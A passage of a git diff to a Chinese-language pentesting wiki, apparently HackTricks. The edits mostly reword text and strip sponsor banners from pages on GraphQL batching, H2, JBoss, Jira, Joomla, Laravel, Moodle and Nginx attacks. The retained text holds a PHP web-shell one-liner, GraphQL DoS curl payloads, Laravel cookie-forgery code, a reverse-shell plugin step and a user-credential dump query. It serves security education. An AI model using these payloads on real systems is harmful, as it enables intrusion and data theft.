 要详细了解 GraphQL 别名,推荐以下资源:[Aliases](https://portswigger.net/web-security/graphql/what-is-graphql#aliases)。
 
-虽然别名的主要目的是减少大量 API 调用的必要性,但已识别出一个意外的用例,其中别名可以被利用来对 GraphQL 端点执行暴力攻击。这是可能的,因为某些端点受到速率限制器的保护,旨在通过限制**HTTP 请求的数量**来阻止暴力攻击。然而,这些速率限制器可能没有考虑到每个请求中的操作数量。鉴于别名允许在单个 HTTP 请求中包含多个查询,它们可以绕过此类速率限制措施。
+虽然别名的主要目的是减少大量 API 调用的必要性,但已识别出一个意外的用例,其中别名可以被利用来对 GraphQL 端点执行暴力攻击。这是可能的,因为某些端点受到速率限制器的保护,旨在通过限制**HTTP 请求的数量**来阻止暴力攻击。然而,这些速率限制器可能没有考虑到每个请求中的操作数量。鉴于别名允许在单个 HTTP 请求中包含多个查询,因此它们可以绕过此类速率限制措施。
 
 考虑下面提供的示例,它说明了如何使用别名查询来验证商店折扣代码的有效性。这种方法可以绕过速率限制,因为它将多个查询编译成一个 HTTP 请求,可能允许同时验证多个折扣代码。
 ```bash
@@ -507,7 +502,7 @@ curl -X POST -H "Content-Type: application/json" \
 
 ### **基于数组的查询批处理**
 
-**基于数组的查询批处理**是一种漏洞,其中GraphQL API允许在单个请求中批处理多个查询,使攻击者能够同时发送大量查询。这可能通过并行执行所有批处理查询来压垮后端,消耗过多的资源(CPU、内存、数据库连接),并可能导致**服务拒绝(DoS)**。如果对批处理中的查询数量没有限制,攻击者可以利用这一点来降低服务可用性。
+**基于数组的查询批处理**是一种漏洞,其中GraphQL API允许在单个请求中批处理多个查询,使攻击者能够同时发送大量查询。这可能会通过并行执行所有批处理查询来压垮后端,消耗过多的资源(CPU、内存、数据库连接),并可能导致**服务拒绝(DoS)**。如果对批处理中的查询数量没有限制,攻击者可以利用这一点来降低服务可用性。
 ```graphql
 # Test provided by https://github.com/dolevf/graphql-cop
 curl -X POST -H "User-Agent: graphql-cop/1.13" \
@@ -515,7 +510,7 @@ curl -X POST -H "User-Agent: graphql-cop/1.13" \
 -d '[{"query": "query cop { __typename }"}, {"query": "query cop { __typename }"}, {"query": "query cop { __typename }"}, {"query": "query cop { __typename }"}, {"query": "query cop { __typename }"}, {"query": "query cop { __typename }"}, {"query": "query cop { __typename }"}, {"query": "query cop { __typename }"}, {"query": "query cop { __typename }"}, {"query": "query cop { __typename }"}]' \
 'https://example.com/graphql'
 ```
-在这个例子中,10个不同的查询被批量处理成一个请求,迫使服务器同时执行所有查询。如果利用更大的批量大小或计算开销大的查询,这可能会使服务器过载。
+在这个例子中,10个不同的查询被批处理成一个请求,迫使服务器同时执行所有查询。如果利用更大的批处理大小或计算开销大的查询,这可能会使服务器过载。
 
 ### **指令过载漏洞**
 
@@ -527,7 +522,7 @@ curl -X POST -H "User-Agent: graphql-cop/1.13" \
 -d '{"query": "query cop { __typename @aa@aa@aa@aa@aa@aa@aa@aa@aa@aa }", "operationName": "cop"}' \
 'https://example.com/graphql'
 ```
-请注意,在前面的示例中,`@aa` 是一个**可能未声明**的自定义指令。通常存在的一个常见指令是**`@include`**:
+请注意,在前面的示例中,`@aa` 是一个自定义指令,**可能未被声明**。通常存在的一个常见指令是 **`@include`**:
 ```bash
 curl -X POST \
 -H "Content-Type: application/json" \
@@ -559,10 +554,10 @@ curl -X POST -H "User-Agent: graphql-cop/1.13" -H "Content-Type: application/jso
 - [https://github.com/dolevf/graphql-cop](https://github.com/dolevf/graphql-cop): 测试graphql端点的常见错误配置
 - [https://github.com/assetnote/batchql](https://github.com/assetnote/batchql): 重点进行批量GraphQL查询和变更的GraphQL安全审计脚本。
 - [https://github.com/dolevf/graphw00f](https://github.com/dolevf/graphw00f): 指纹识别正在使用的graphql
-- [https://github.com/gsmith257-cyber/GraphCrawler](https://github.com/gsmith257-cyber/GraphCrawler): 可用于抓取模式和搜索敏感数据、测试授权、暴力破解模式以及查找特定类型路径的工具包。
+- [https://github.com/gsmith257-cyber/GraphCrawler](https://github.com/gsmith257-cyber/GraphCrawler): 可用于抓取模式和搜索敏感数据、测试授权、暴力破解模式以及查找给定类型的路径的工具包。
 - [https://blog.doyensec.com/2020/03/26/graphql-scanner.html](https://blog.doyensec.com/2020/03/26/graphql-scanner.html): 可作为独立工具或[Burp扩展](https://github.com/doyensec/inql)使用。
 - [https://github.com/swisskyrepo/GraphQLmap](https://github.com/swisskyrepo/GraphQLmap): 也可以作为CLI客户端使用以自动化攻击
-- [https://gitlab.com/dee-see/graphql-path-enum](https://gitlab.com/dee-see/graphql-path-enum): 列出在GraphQL模式中**到达特定类型的不同方式**的工具。
+- [https://gitlab.com/dee-see/graphql-path-enum](https://gitlab.com/dee-see/graphql-path-enum): 列出在GraphQL模式中**到达给定类型的不同方式**的工具。
 - [https://github.com/doyensec/GQLSpection](https://github.com/doyensec/GQLSpection): InQL的独立和CLI模式的继任者
 - [https://github.com/doyensec/inql](https://github.com/doyensec/inql): 用于高级GraphQL测试的Burp扩展。_**扫描器**_是InQL v5.0的核心,您可以分析GraphQL端点或本地自省模式文件。它自动生成所有可能的查询和变更,并将其组织成结构化视图以供分析。_**攻击者**_组件允许您运行批量GraphQL攻击,这对于规避实现不佳的速率限制非常有用。
 - [https://github.com/nikitastupin/clairvoyance](https://github.com/nikitastupin/clairvoyance): 尝试通过使用一些Graphql数据库的帮助,即使在禁用自省的情况下也获取模式,这些数据库将建议变更和参数的名称。
@@ -588,10 +583,5 @@ curl -X POST -H "User-Agent: graphql-cop/1.13" -H "Content-Type: application/jso
 - [**https://medium.com/@the.bilal.rizwan/graphql-common-vulnerabilities-how-to-exploit-them-464f9fdce696**](https://medium.com/@the.bilal.rizwan/graphql-common-vulnerabilities-how-to-exploit-them-464f9fdce696)
 - [**https://portswigger.net/web-security/graphql**](https://portswigger.net/web-security/graphql)
 
-

-
-通过8kSec Academy深化您在**移动安全**方面的专业知识。通过我们的自学课程掌握iOS和Android安全并获得认证:
-
-{% embed url="https://academy.8ksec.io/" %}
 
 {{#include ../../banners/hacktricks-training.md}}
diff --git a/src/network-services-pentesting/pentesting-web/h2-java-sql-database.md b/src/network-services-pentesting/pentesting-web/h2-java-sql-database.md
index c9980f284..de8fde806 100644
--- a/src/network-services-pentesting/pentesting-web/h2-java-sql-database.md
+++ b/src/network-services-pentesting/pentesting-web/h2-java-sql-database.md
@@ -2,17 +2,15 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
-{% embed url="https://websec.nl/" %}
-
 官方页面: [https://www.h2database.com/html/main.html](https://www.h2database.com/html/main.html)
 
 ## 访问
 
-您可以指定一个**不存在的数据库名称**以**在没有有效凭据的情况下创建新数据库**(**未认证**):
+您可以指示一个**不存在的数据库名称**以**在没有有效凭据的情况下创建新数据库**(**未认证**):
 
 ![](<../../images/image (131).png>)
 
-或者如果您知道例如**mysql正在运行**,并且您知道**数据库名称**和该数据库的**凭据**,您可以直接访问它:
+或者如果您知道例如**mysql正在运行**并且您知道**数据库名称**和**该数据库的凭据**,您可以直接访问它:
 
 ![](<../../images/image (201).png>)
 
@@ -20,7 +18,7 @@ _**来自HTB的Hawk盒子的技巧。**_
 
 ## **RCE**
 
-访问H2数据库后,请查看此漏洞以获取RCE: [https://gist.github.com/h4ckninja/22b8e2d2f4c29e94121718a43ba97eed](https://gist.github.com/h4ckninja/22b8e2d2f4c29e94121718a43ba97eed)
+访问H2数据库后,请查看此漏洞以获取RCE:[https://gist.github.com/h4ckninja/22b8e2d2f4c29e94121718a43ba97eed](https://gist.github.com/h4ckninja/22b8e2d2f4c29e94121718a43ba97eed)
 
 ## H2 SQL注入到RCE
 
@@ -35,6 +33,4 @@ _**来自HTB的Hawk盒子的技巧。**_
 },
 [...]
 ```
-{% embed url="https://websec.nl/" %}
-
 {{#include ../../banners/hacktricks-training.md}}
diff --git a/src/network-services-pentesting/pentesting-web/jboss.md b/src/network-services-pentesting/pentesting-web/jboss.md
index e6289c325..a764c3afd 100644
--- a/src/network-services-pentesting/pentesting-web/jboss.md
+++ b/src/network-services-pentesting/pentesting-web/jboss.md
@@ -2,20 +2,16 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
-

 
-**漏洞赏金提示**:**注册** **Intigriti**,这是一个由黑客为黑客创建的高级**漏洞赏金平台**!今天就加入我们,访问 [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks),开始赚取高达 **$100,000** 的赏金!
-
-{% embed url="https://go.intigriti.com/hacktricks" %}
 
 ## 枚举和利用技术
 
-在评估Web应用程序的安全性时,某些路径如 _/web-console/ServerInfo.jsp_ 和 _/status?full=true_ 对于揭示 **服务器详细信息** 至关重要。对于 JBoss 服务器,路径如 _/admin-console_、 _/jmx-console_、 _/management_ 和 _/web-console_ 可能是关键。这些路径可能允许访问 **管理servlet**,默认凭据通常设置为 **admin/admin**。此访问权限便于通过特定的servlet与 MBeans 进行交互:
+在评估 web 应用程序的安全性时,某些路径如 _/web-console/ServerInfo.jsp_ 和 _/status?full=true_ 对于揭示 **服务器详细信息** 至关重要。对于 JBoss 服务器,路径如 _/admin-console_、_/jmx-console_、_/management_ 和 _/web-console_ 可能是关键。这些路径可能允许访问 **管理 servlet**,默认凭据通常设置为 **admin/admin**。此访问权限便于通过特定 servlet 与 MBeans 进行交互:
 
-- 对于 JBoss 6 和 7 版本,使用 **/web-console/Invoker**。
+- 对于 JBoss 版本 6 和 7,使用 **/web-console/Invoker**。
 - 在 JBoss 5 及更早版本中,提供 **/invoker/JMXInvokerServlet** 和 **/invoker/EJBInvokerServlet**。
 
-像 **clusterd** 这样的工具可在 [https://github.com/hatRiot/clusterd](https://github.com/hatRiot/clusterd) 获取,并且 Metasploit 模块 `auxiliary/scanner/http/jboss_vulnscan` 可用于枚举和潜在利用 JBoss 服务中的漏洞。
+像 **clusterd** 这样的工具可在 [https://github.com/hatRiot/clusterd](https://github.com/hatRiot/clusterd) 获取,以及 Metasploit 模块 `auxiliary/scanner/http/jboss_vulnscan` 可用于枚举和潜在利用 JBOSS 服务中的漏洞。
 
 ### 利用资源
 
@@ -23,12 +19,8 @@
 
 ### 寻找易受攻击的目标
 
-Google Dorking 可以帮助识别易受攻击的服务器,查询示例: `inurl:status EJInvokerServlet`
+Google Dorking 可以通过查询 `inurl:status EJInvokerServlet` 来帮助识别易受攻击的服务器。
 
-

 
-**漏洞赏金提示**:**注册** **Intigriti**,这是一个由黑客为黑客创建的高级**漏洞赏金平台**!今天就加入我们,访问 [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks),开始赚取高达 **$100,000** 的赏金!
-
-{% embed url="https://go.intigriti.com/hacktricks" %}
 
 {{#include ../../banners/hacktricks-training.md}}
diff --git a/src/network-services-pentesting/pentesting-web/jira.md b/src/network-services-pentesting/pentesting-web/jira.md
index 6bec22a06..5df487842 100644
--- a/src/network-services-pentesting/pentesting-web/jira.md
+++ b/src/network-services-pentesting/pentesting-web/jira.md
@@ -2,17 +2,11 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
-

-
-如果你对**黑客职业**感兴趣并想要攻克不可攻克的目标 - **我们正在招聘!** (_需要流利的波兰语书写和口语能力_).
-
-{% embed url="https://www.stmcyber.com/careers" %}
-
 ## 检查权限
 
-在Jira中,**任何用户**(无论是否经过身份验证)都可以通过端点`/rest/api/2/mypermissions`或`/rest/api/3/mypermissions`来**检查权限**。这些端点揭示了用户当前的权限。当**未认证用户拥有权限**时,出现了一个显著的担忧,这表明存在**安全漏洞**,可能有资格获得**赏金**。同样,**认证用户的意外权限**也突显了一个**漏洞**。
+在 Jira 中,**任何用户都可以检查权限**,无论是否经过身份验证,通过端点 `/rest/api/2/mypermissions` 或 `/rest/api/3/mypermissions`。这些端点揭示了用户当前的权限。当 **未经过身份验证的用户拥有权限** 时,出现了一个显著的担忧,这表明存在 **安全漏洞**,可能有资格获得 **赏金**。同样,**经过身份验证的用户的意外权限** 也突显了一个 **漏洞**。
 
-在**2019年2月1日**进行了重要的**更新**,要求'mypermissions'端点包含一个**'permission'参数**。此要求旨在通过指定被查询的权限来**增强安全性**:[在这里查看](https://developer.atlassian.com/cloud/jira/platform/change-notice-get-my-permissions-requires-permissions-query-parameter/#change-notice---get-my-permissions-resource-will-require-a-permissions-query-parameter)
+在 **2019年2月1日** 进行了重要的 **更新**,要求 'mypermissions' 端点包含 **'permission' 参数**。此要求旨在通过指定被查询的权限来 **增强安全性**: [check it here](https://developer.atlassian.com/cloud/jira/platform/change-notice-get-my-permissions-requires-permissions-query-parameter/#change-notice---get-my-permissions-resource-will-require-a-permissions-query-parameter)
 
 - ADD_COMMENTS
 - ADMINISTER
@@ -56,7 +50,7 @@
 - VIEW_VOTERS_AND_WATCHERS
 - WORK_ON_ISSUES
 
-示例: `https://your-domain.atlassian.net/rest/api/2/mypermissions?permissions=BROWSE_PROJECTS,CREATE_ISSUES,ADMINISTER_PROJECTS`
+示例: `https://your-domain.atlassian.net/rest/api/2/mypermissions?permissions=BROWSE_PROJECTS,CREATE_ISSUES,ADMINISTER_PROJECTS`
 ```bash
 #Check non-authenticated privileges
 curl https://jira.some.example.com/rest/api/2/mypermissions | jq | grep -iB6 '"havePermission": true'
@@ -116,10 +110,4 @@ public OutputType getOutputType() { return OutputType.BLOCK; }
 - **反向Shell**:或者获取一个反向Shell。
 - **DOM代理**:如果Confluence在私有网络内,可以通过某个有访问权限的用户的浏览器建立连接,例如通过它联系服务器执行命令。
 
-

-
-如果你对**黑客职业**感兴趣并想要攻克不可攻克的目标 - **我们正在招聘!**(_要求流利的波兰语书写和口语_)。
-
-{% embed url="https://www.stmcyber.com/careers" %}
-
 {{#include ../../banners/hacktricks-training.md}}
diff --git a/src/network-services-pentesting/pentesting-web/joomla.md b/src/network-services-pentesting/pentesting-web/joomla.md
index 28012dff2..d8290c2f8 100644
--- a/src/network-services-pentesting/pentesting-web/joomla.md
+++ b/src/network-services-pentesting/pentesting-web/joomla.md
@@ -2,15 +2,10 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
-

-
-通过8kSec Academy深化您在**移动安全**方面的专业知识。通过我们的自学课程掌握iOS和Android安全并获得认证:
-
-{% embed url="https://academy.8ksec.io/" %}
 
 ### Joomla 统计
 
-Joomla 收集一些匿名的 [使用统计数据](https://developer.joomla.org/about/stats.html),例如 Joomla、PHP 和数据库版本的细分以及在 Joomla 安装中使用的服务器操作系统。这些数据可以通过他们的公共 [API](https://developer.joomla.org/about/stats/api.html) 查询。
+Joomla 收集了一些匿名的 [使用统计数据](https://developer.joomla.org/about/stats.html),例如 Joomla、PHP 和数据库版本的分布以及在 Joomla 安装中使用的服务器操作系统。这些数据可以通过他们的公共 [API](https://developer.joomla.org/about/stats/api.html) 查询。
 ```bash
 curl -s https://developer.joomla.org/stats/cms_version | python3 -m json.tool
 
@@ -97,26 +92,20 @@ admin:admin
 ```
 ## RCE
 
-如果你成功获得了 **admin credentials**,你可以通过向 **模板** 添加一段 **PHP 代码** 来实现 **RCE**。我们可以通过 **自定义** 一个 **模板** 来做到这一点。
+如果你成功获取了 **admin credentials**,你可以通过添加一段 **PHP code** 来 **RCE inside of it**。我们可以通过 **customizing** 一个 **template** 来实现。
 
 1. **点击** 左下角的 **`Templates`** 在 `Configuration` 下拉出模板菜单。
-2. **点击** 一个 **模板** 名称。我们选择 **`protostar`** 在 `Template` 列标题下。这将带我们到 **`Templates: Customise`** 页面。
-3. 最后,你可以点击一个页面以拉出 **页面源代码**。我们选择 **`error.php`** 页面。我们将添加一个 **PHP 一行代码以获得代码执行**,如下所示:
+2. **点击** 一个 **template** 名称。我们选择 **`protostar`** 在 `Template` 列标题下。这将带我们到 **`Templates: Customise`** 页面。
+3. 最后,你可以点击一个页面以拉出 **page source**。我们选择 **`error.php`** 页面。我们将添加一个 **PHP one-liner 来获取代码执行**,如下所示:
 1. **`system($_GET['cmd']);`**
 4. **保存并关闭**
 5. `curl -s http://joomla-site.local/templates/protostar/error.php?cmd=id`
 
-## 从 XSS 到 RCE
+## From XSS to RCE
 
-- [**JoomSploit**](https://github.com/nowak0x01/JoomSploit):Joomla 利用脚本,可以 **将 XSS 升级为 RCE 或其他关键漏洞**。更多信息请查看 [**这篇文章**](https://nowak0x01.github.io/papers/76bc0832a8f682a7e0ed921627f85d1d.html)。它支持 **Joomla 版本 5.X.X、4.X.X 和 3.X.X,并允许:**
-- _**权限提升:**_ 在 Joomla 中创建一个用户。
-- _**(RCE) 内置模板编辑:**_ 编辑 Joomla 中的内置模板。
-- _**(自定义) 自定义利用:**_ 针对第三方 Joomla 插件的自定义利用。
-
-

-
-通过 8kSec Academy 深入你的 **移动安全** 专业知识。通过我们的自学课程掌握 iOS 和 Android 安全并获得认证:
-
-{% embed url="https://academy.8ksec.io/" %}
+- [**JoomSploit**](https://github.com/nowak0x01/JoomSploit): Joomla 利用脚本,可以 **将 XSS 升级为 RCE 或其他关键漏洞**。更多信息请查看 [**这篇文章**](https://nowak0x01.github.io/papers/76bc0832a8f682a7e0ed921627f85d1d.html)。它支持 **Joomla 版本 5.X.X, 4.X.X 和 3.X.X,并允许:**
+- _**Privilege Escalation:**_ 在 Joomla 中创建一个用户。
+- _**(RCE) 内置模板编辑:**_ 编辑 Joomla 中的内置模板。
+- _**(Custom) 自定义利用:**_ 针对第三方 Joomla 插件的自定义利用。 
 
 {{#include ../../banners/hacktricks-training.md}}
diff --git a/src/network-services-pentesting/pentesting-web/laravel.md b/src/network-services-pentesting/pentesting-web/laravel.md
index e382ed70a..e6484e1f3 100644
--- a/src/network-services-pentesting/pentesting-web/laravel.md
+++ b/src/network-services-pentesting/pentesting-web/laravel.md
@@ -2,32 +2,27 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
-

-
-通过8kSec Academy深化您在**移动安全**方面的专业知识。通过我们的自学课程掌握iOS和Android安全并获得认证:
-
-{% embed url="https://academy.8ksec.io/" %}
 
 ## Laravel Tricks
 
 ### 调试模式
 
-如果Laravel处于**调试模式**,您将能够访问**代码**和**敏感数据**。\
+如果 Laravel 处于 **调试模式**,您将能够访问 **代码** 和 **敏感数据**。\
 例如 `http://127.0.0.1:8000/profiles`:
 
 ![](<../../images/image (1046).png>)
 
-这通常是利用其他Laravel RCE CVE所需的。
+这通常是利用其他 Laravel RCE CVE 所需的。
 
 ### .env
 
-Laravel将用于加密cookie和其他凭据的APP保存在一个名为`.env`的文件中,可以通过某些路径遍历访问:`/../.env`
+Laravel 将用于加密 cookies 和其他凭据的 APP 保存在一个名为 `.env` 的文件中,可以通过某些路径遍历访问:`/../.env`
 
-Laravel还将在调试页面中显示此信息(当Laravel发现错误并激活时会出现)。
+Laravel 还会在调试页面中显示此信息(当 Laravel 发现错误并激活时会出现)。
 
-使用Laravel的秘密APP_KEY,您可以解密和重新加密cookie:
+使用 Laravel 的秘密 APP_KEY,您可以解密和重新加密 cookies:
 
-### 解密Cookie
+### 解密 Cookie
 ```python
 import os
 import json
@@ -90,7 +85,7 @@ encrypt(b'{"data":"a:6:{s:6:\\"_token\\";s:40:\\"RYB6adMfWWTSNXaDfEw74ADcfMGIFC2
 
 易受攻击的版本:5.5.40 和 5.6.x 通过 5.6.29 ([https://www.cvedetails.com/cve/CVE-2018-15133/](https://www.cvedetails.com/cve/CVE-2018-15133/))
 
-在这里可以找到关于反序列化漏洞的信息:[https://labs.withsecure.com/archive/laravel-cookie-forgery-decryption-and-rce/](https://labs.withsecure.com/archive/laravel-cookie-forgery-decryption-and-rce/)
+您可以在这里找到有关反序列化漏洞的信息:[https://labs.withsecure.com/archive/laravel-cookie-forgery-decryption-and-rce/](https://labs.withsecure.com/archive/laravel-cookie-forgery-decryption-and-rce/)
 
 您可以使用 [https://github.com/kozmic/laravel-poc-CVE-2018-15133](https://github.com/kozmic/laravel-poc-CVE-2018-15133) 进行测试和利用\
 或者您也可以使用 metasploit 进行利用:`use unix/http/laravel_token_unserialize_exec`
@@ -103,10 +98,5 @@ encrypt(b'{"data":"a:6:{s:6:\\"_token\\";s:40:\\"RYB6adMfWWTSNXaDfEw74ADcfMGIFC2
 
 在这里阅读有关此内容的信息:[https://stitcher.io/blog/unsafe-sql-functions-in-laravel](https://stitcher.io/blog/unsafe-sql-functions-in-laravel)
 
-

-
-通过 8kSec Academy 深入您的 **移动安全** 专业知识。通过我们的自学课程掌握 iOS 和 Android 安全并获得认证:
-
-{% embed url="https://academy.8ksec.io/" %}
 
 {{#include ../../banners/hacktricks-training.md}}
diff --git a/src/network-services-pentesting/pentesting-web/moodle.md b/src/network-services-pentesting/pentesting-web/moodle.md
index f02714cde..275603082 100644
--- a/src/network-services-pentesting/pentesting-web/moodle.md
+++ b/src/network-services-pentesting/pentesting-web/moodle.md
@@ -2,11 +2,6 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
-

-
-**漏洞赏金提示**: **注册** **Intigriti**,一个由黑客为黑客创建的高级**漏洞赏金平台**!今天就加入我们,访问 [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks),开始赚取高达 **$100,000** 的赏金!
-
-{% embed url="https://go.intigriti.com/hacktricks" %}
 
 ## 自动扫描
 
@@ -68,7 +63,7 @@ cmsmap http://moodle.example.com/
 ```
 ### CVEs
 
-我发现自动工具在查找影响moodle版本的漏洞方面非常**无用**。你可以在[**https://snyk.io/vuln/composer:moodle%2Fmoodle**](https://snyk.io/vuln/composer:moodle%2Fmoodle)中**检查**它们。
+我发现自动工具在查找影响moodle版本的漏洞时非常**无用**。你可以在[**https://snyk.io/vuln/composer:moodle%2Fmoodle**](https://snyk.io/vuln/composer:moodle%2Fmoodle)中**检查**它们。
 
 ## **RCE**
 
@@ -76,9 +71,9 @@ cmsmap http://moodle.example.com/
 
 ![](<../../images/image (630).png>)
 
-如果你是管理员,你可能仍然需要**激活此选项**。你可以在moodle特权升级PoC中查看如何操作:[https://github.com/HoangKien1020/CVE-2020-14321](https://github.com/HoangKien1020/CVE-2020-14321)。
+如果你是管理员,你可能仍然需要**激活此选项**。你可以在moodle特权提升PoC中查看如何操作:[https://github.com/HoangKien1020/CVE-2020-14321](https://github.com/HoangKien1020/CVE-2020-14321)。
 
-然后,你可以**安装以下插件**,该插件包含经典的pentest-monkey php r**ev shell**(_在上传之前,你需要解压缩它,修改revshell的IP和端口,然后再压缩它_)
+然后,你可以**安装以下插件**,该插件包含经典的pentest-monkey php r**ev shell**(_在上传之前,你需要解压缩它,修改revshell的IP和端口,然后再压缩_)
 
 {% file src="../../images/moodle-rce-plugin.zip" %}
 
@@ -98,10 +93,4 @@ find / -name "config.php" 2>/dev/null | grep "moodle/config.php"
 ```bash
 /usr/local/bin/mysql -u  --password= -e "use moodle; select email,username,password from mdl_user; exit"
 ```
-

-
-**漏洞赏金提示**: **注册** **Intigriti**,一个由黑客为黑客创建的高级**漏洞赏金平台**!今天就加入我们,访问 [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks),开始赚取高达 **$100,000** 的赏金!
-
-{% embed url="https://go.intigriti.com/hacktricks" %}
-
 {{#include ../../banners/hacktricks-training.md}}
diff --git a/src/network-services-pentesting/pentesting-web/nginx.md b/src/network-services-pentesting/pentesting-web/nginx.md
index 4b1520dc3..2265708db 100644
--- a/src/network-services-pentesting/pentesting-web/nginx.md
+++ b/src/network-services-pentesting/pentesting-web/nginx.md
@@ -2,17 +2,10 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
-

 
-**从黑客的角度看待您的网络应用、网络和云**
+## 缺失根位置 
 
-**查找并报告具有实际业务影响的关键可利用漏洞。** 使用我们20多个自定义工具来映射攻击面,发现让您提升权限的安全问题,并使用自动化漏洞利用收集重要证据,将您的辛勤工作转化为有说服力的报告。
-
-{% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %}
-
-## 缺失的根位置 
-
-在配置Nginx服务器时,**root指令**通过定义文件提供的基础目录发挥着关键作用。考虑下面的示例:
+在配置 Nginx 服务器时,**root 指令**通过定义文件提供的基础目录发挥着关键作用。考虑下面的示例:
 ```bash
 server {
 root /etc/nginx;
@@ -25,7 +18,7 @@ proxy_pass http://127.0.0.1:8080/;
 ```
 在此配置中,`/etc/nginx` 被指定为根目录。此设置允许访问指定根目录中的文件,例如 `/hello.txt`。然而,重要的是要注意,仅定义了一个特定位置(`/hello.txt`)。根位置(`location / {...}`)没有配置。这一遗漏意味着根指令适用于全局,使得对根路径 `/` 的请求能够访问 `/etc/nginx` 下的文件。
 
-此配置引发了一个关键的安全考虑。一个简单的 `GET` 请求,例如 `GET /nginx.conf`,可能会通过提供位于 `/etc/nginx/nginx.conf` 的 Nginx 配置文件来暴露敏感信息。将根目录设置为不那么敏感的目录,例如 `/etc`,可以减轻此风险,但仍可能允许对其他关键文件的意外访问,包括其他配置文件、访问日志,甚至用于 HTTP 基本身份验证的加密凭据。
+此配置引发了一个关键的安全考虑。一个简单的 `GET` 请求,例如 `GET /nginx.conf`,可能会通过提供位于 `/etc/nginx/nginx.conf` 的 Nginx 配置文件来暴露敏感信息。将根目录设置为不那么敏感的目录,例如 `/etc`,可以减轻此风险,但仍可能允许意外访问其他关键文件,包括其他配置文件、访问日志,甚至用于 HTTP 基本身份验证的加密凭据。
 
 ## Alias LFI Misconfiguration 
 
@@ -88,7 +81,7 @@ location / {
 return 302 https://example.com$uri;
 }
 ```
-字符 \r (回车) 和 \n (换行) 在 HTTP 请求中表示新行字符,它们的 URL 编码形式表示为 `%0d%0a`。在请求中包含这些字符(例如,`http://localhost/%0d%0aDetectify:%20clrf`)到一个配置错误的服务器会导致服务器发出一个名为 `Detectify` 的新头。这是因为 $uri 变量解码了 URL 编码的新行字符,从而导致响应中出现意外的头:
+字符 \r (回车) 和 \n (换行) 在 HTTP 请求中表示新行字符,它们的 URL 编码形式表示为 `%0d%0a`。在请求中包含这些字符(例如,`http://localhost/%0d%0aDetectify:%20clrf`)到一个配置错误的服务器会导致服务器发出一个名为 `Detectify` 的新头部。这是因为 $uri 变量解码了 URL 编码的新行字符,从而导致响应中出现意外的头部:
 ```
 HTTP/1.1 302 Moved Temporarily
 Server: nginx/1.19.3
@@ -100,7 +93,7 @@ Detectify: clrf
 ```
 了解有关 CRLF 注入和响应拆分的风险,请访问 [https://blog.detectify.com/2019/06/14/http-response-splitting-exploitations-and-mitigations/](https://blog.detectify.com/2019/06/14/http-response-splitting-exploitations-and-mitigations/)。
 
-此外,这种技术在 [**这个演讲中解释**](https://www.youtube.com/watch?v=gWQyWdZbdoY&list=PL0xCSYnG_iTtJe2V6PQqamBF73n7-f1Nr&index=77) 了,其中包含一些易受攻击的示例和检测机制。例如,为了从黑箱的角度检测此错误配置,您可以使用以下请求:
+此外,这种技术在 [**这个演讲中解释**](https://www.youtube.com/watch?v=gWQyWdZbdoY&list=PL0xCSYnG_iTtJe2V6PQqamBF73n7-f1Nr&index=77) ,提供了一些易受攻击的示例和检测机制。例如,为了从黑箱的角度检测这种错误配置,您可以使用以下请求:
 
 - `https://example.com/%20X` - 任何 HTTP 代码
 - `https://example.com/%20H` - 400 错误请求
@@ -175,7 +168,7 @@ proxy_hide_header Secret-Header;
 
 ### **Maclicious 响应头**
 
-如 [**此文**](https://mizu.re/post/cors-playground) 所示,如果 Web 服务器的响应中存在某些头,它们将改变 Nginx 代理的行为。您可以在 [**文档中查看**](https://www.nginx.com/resources/wiki/start/topics/examples/x-accel/):
+如 [**此文**](https://mizu.re/post/cors-playground) 所示,如果某些头出现在来自 Web 服务器的响应中,它们将改变 Nginx 代理的行为。您可以在 [**文档中查看**](https://www.nginx.com/resources/wiki/start/topics/examples/x-accel/):
 
 - `X-Accel-Redirect`: 指示 Nginx 将请求内部重定向到指定位置。
 - `X-Accel-Buffering`: 控制 Nginx 是否应缓冲响应。
@@ -206,7 +199,7 @@ return 200 "Hello. It is private area: $mappocallow";
 }
 }
 ```
-没有 `default`,**恶意用户**可以通过访问 `/map-poc` 中的 **未定义 URI** 来绕过安全性。[Nginx 手册](https://nginx.org/en/docs/http/ngx_http_map_module.html) 建议设置 **默认值** 以避免此类问题。
+没有 `default`,**恶意用户** 可以通过访问 `/map-poc` 中的 **未定义 URI** 来绕过安全性。[Nginx 手册](https://nginx.org/en/docs/http/ngx_http_map_module.html) 建议设置 **默认值** 以避免此类问题。
 
 ### **DNS 欺骗漏洞**
 
@@ -216,7 +209,7 @@ resolver 8.8.8.8;
 ```
 ### **`proxy_pass` 和 `internal` 指令**
 
-**`proxy_pass`** 指令用于将请求重定向到其他服务器,无论是内部还是外部。**`internal`** 指令确保某些位置仅在 Nginx 内部可访问。虽然这些指令本身不是漏洞,但其配置需要仔细检查以防止安全漏洞。
+**`proxy_pass`** 指令用于将请求重定向到其他服务器,无论是内部还是外部。**`internal`** 指令确保某些位置仅在 Nginx 内部可访问。虽然这些指令本身并不是漏洞,但其配置需要仔细检查以防止安全漏洞。
 
 ## proxy_set_header Upgrade & Connection
 
@@ -225,7 +218,7 @@ resolver 8.8.8.8;
 > [!CAUTION]
 > 这个漏洞将允许攻击者 **与 `proxy_pass` 端点建立直接连接**(在这种情况下是 `http://backend:9999`),其内容不会被 nginx 检查。
 
-从 [这里](https://bishopfox.com/blog/h2c-smuggling-request) 偷取 `/flag` 的脆弱配置示例:
+从 [这里](https://bishopfox.com/blog/h2c-smuggling-request) 获取的窃取 `/flag` 的漏洞配置示例:
 ```
 server {
 listen       443 ssl;
@@ -270,12 +263,5 @@ Nginxpwner 是一个简单的工具,用于查找常见的 Nginx 错误配置
 - [**http://blog.zorinaq.com/nginx-resolver-vulns/**](http://blog.zorinaq.com/nginx-resolver-vulns/)
 - [**https://github.com/yandex/gixy/issues/115**](https://github.com/yandex/gixy/issues/115)
 
-

-
